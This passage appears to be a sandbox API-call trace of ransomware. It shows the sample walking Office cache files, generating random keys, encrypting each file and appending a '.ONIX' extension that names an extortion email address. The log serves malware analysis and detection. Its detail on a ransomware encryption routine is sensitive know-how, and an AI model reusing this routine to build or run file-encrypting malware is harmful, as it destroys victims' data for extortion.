Size=0x80) returned 0x458b00 [0115.097] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0115.097] GetLastError () returned 0x0 [0115.097] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x498 [0115.097] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0115.097] LockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1e6600, nNumberOfBytesToLockHigh=0x0) returned 1 [0115.097] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.097] ReadFile (in: hFile=0x498, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0115.099] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.099] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0115.099] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0115.099] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0115.099] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi", dwFileAttributes=0x80) returned 1 [0115.099] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 78 [0115.099] GetProcessHeap () returned 0x410000 [0115.099] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0115.100] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0115.100] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0115.100] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1992192) returned 1 [0115.100] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1e6600 [0115.100] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0115.100] GetProcessHeap () returned 0x410000 [0115.100] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0115.100] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0115.100] WriteFile (in: hFile=0x498, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0115.102] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0115.103] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0115.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1e6600) returned 0x3680020 [0115.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1e6600) returned 0x3870020 [0115.104] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.104] ReadFile (in: hFile=0x498, lpBuffer=0x3680020, nNumberOfBytesToRead=0x1e6600, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x1e6600, lpOverlapped=0x0) returned 1 [0115.259] UnlockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1e6600, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0115.259] CloseHandle (hObject=0x498) returned 1 [0115.260] GetProcessHeap () returned 0x410000 [0115.260] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0115.260] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0115.264] GetProcessHeap () returned 0x410000 [0115.264] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0115.264] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0115.264] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0115.264] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0115.264] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0115.264] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0115.264] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0115.264] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0115.264] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0115.264] GetLastError () returned 0x0 [0115.264] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x498 [0115.264] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0115.265] LockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10b2, nNumberOfBytesToLockHigh=0x0) returned 1 [0115.265] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.265] ReadFile (in: hFile=0x498, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0115.266] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.266] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0115.267] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0115.267] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0115.267] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", dwFileAttributes=0x80) returned 1 [0115.267] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 78 [0115.267] GetProcessHeap () returned 0x410000 [0115.267] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0115.267] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0115.267] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0115.267] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=4274) returned 1 [0115.267] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x10b2 [0115.267] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0115.267] GetProcessHeap () returned 0x410000 [0115.267] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0115.267] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0115.267] WriteFile (in: hFile=0x498, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0115.269] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0115.270] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0115.271] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10b2) returned 0x4d8b68 [0115.271] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10b2) returned 0x4d9c28 [0115.271] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.271] ReadFile (in: hFile=0x498, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x10b2, lpOverlapped=0x0) returned 1 [0115.271] SetFilePointer (in: hFile=0x498, lDistanceToMove=-4274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.271] WriteFile (in: hFile=0x498, lpBuffer=0x4d9c28*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d9c28*, lpNumberOfBytesWritten=0x367f44c*=0x10b2, lpOverlapped=0x0) returned 1 [0115.272] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0115.272] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d9c28 | out: hHeap=0x410000) returned 1 [0115.272] UnlockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10b2, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0115.272] CloseHandle (hObject=0x498) returned 1 [0115.273] GetProcessHeap () returned 0x410000 [0115.273] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0115.273] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0115.276] GetProcessHeap () returned 0x410000 [0115.276] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0115.276] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0115.276] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0115.276] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0115.276] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec54b6b0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xec54b6b0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x4a687710, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0115.276] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0115.276] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0115.276] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0115.276] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0115.276] GetLastError () returned 0x0 [0115.276] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x498 [0115.287] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0115.287] LockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2a968, nNumberOfBytesToLockHigh=0x0) returned 1 [0115.287] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.287] ReadFile (in: hFile=0x498, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0115.289] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.289] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0115.289] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0115.289] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0115.289] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe", dwFileAttributes=0x80) returned 1 [0115.289] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 71 [0115.289] GetProcessHeap () returned 0x410000 [0115.289] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xfe) returned 0x467908 [0115.289] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" [0115.290] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0115.290] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=174440) returned 1 [0115.290] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x2a968 [0115.290] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0115.290] GetProcessHeap () returned 0x410000 [0115.290] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x467a10 [0115.290] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x467a10*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x467a10*, pdwDataLen=0x367f414*=0x100) returned 1 [0115.290] WriteFile (in: hFile=0x498, lpBuffer=0x467a10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x467a10*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0115.291] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0115.292] WriteFile (in: hFile=0x498, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0115.294] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2a968) returned 0xf50048 [0115.295] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2a968) returned 0xf7a9b8 [0115.296] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.296] ReadFile (in: hFile=0x498, lpBuffer=0xf50048, nNumberOfBytesToRead=0x2a968, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x2a968, lpOverlapped=0x0) returned 1 [0115.303] UnlockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2a968, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0115.304] CloseHandle (hObject=0x498) returned 1 [0115.304] GetProcessHeap () returned 0x410000 [0115.304] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467a10 | out: hHeap=0x410000) returned 1 [0115.304] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0115.306] GetProcessHeap () returned 0x410000 [0115.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0115.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0115.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0115.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0115.306] FindNextFileW (in: hFindFile=0x48ecf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde72fbf0, ftCreationTime.dwHighDateTime=0x1cb0d0b, ftLastAccessTime.dwLowDateTime=0xde72fbf0, ftLastAccessTime.dwHighDateTime=0x1cb0d0b, ftLastWriteTime.dwLowDateTime=0x49c902c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0115.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0115.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0115.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458b00 [0115.306] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0115.307] GetLastError () returned 0x0 [0115.307] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x498 [0115.307] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0115.307] LockFile (hFile=0x498, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x709768, nNumberOfBytesToLockHigh=0x0) returned 1 [0115.307] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0115.307] ReadFile (in: hFile=0x498, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0115.309] SetFilePointerEx (in: hFile=0x498, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.309] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0115.309] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0115.309] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0115.309] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll", dwFileAttributes=0x80) returned 1 [0115.309] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 74 [0115.309] GetProcessHeap () returned 0x410000 [0115.309] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x104) returned 0x4d6b80 [0115.309] lstrcpyW (in: lpString1=0x4d6b80, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" [0115.309] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX") 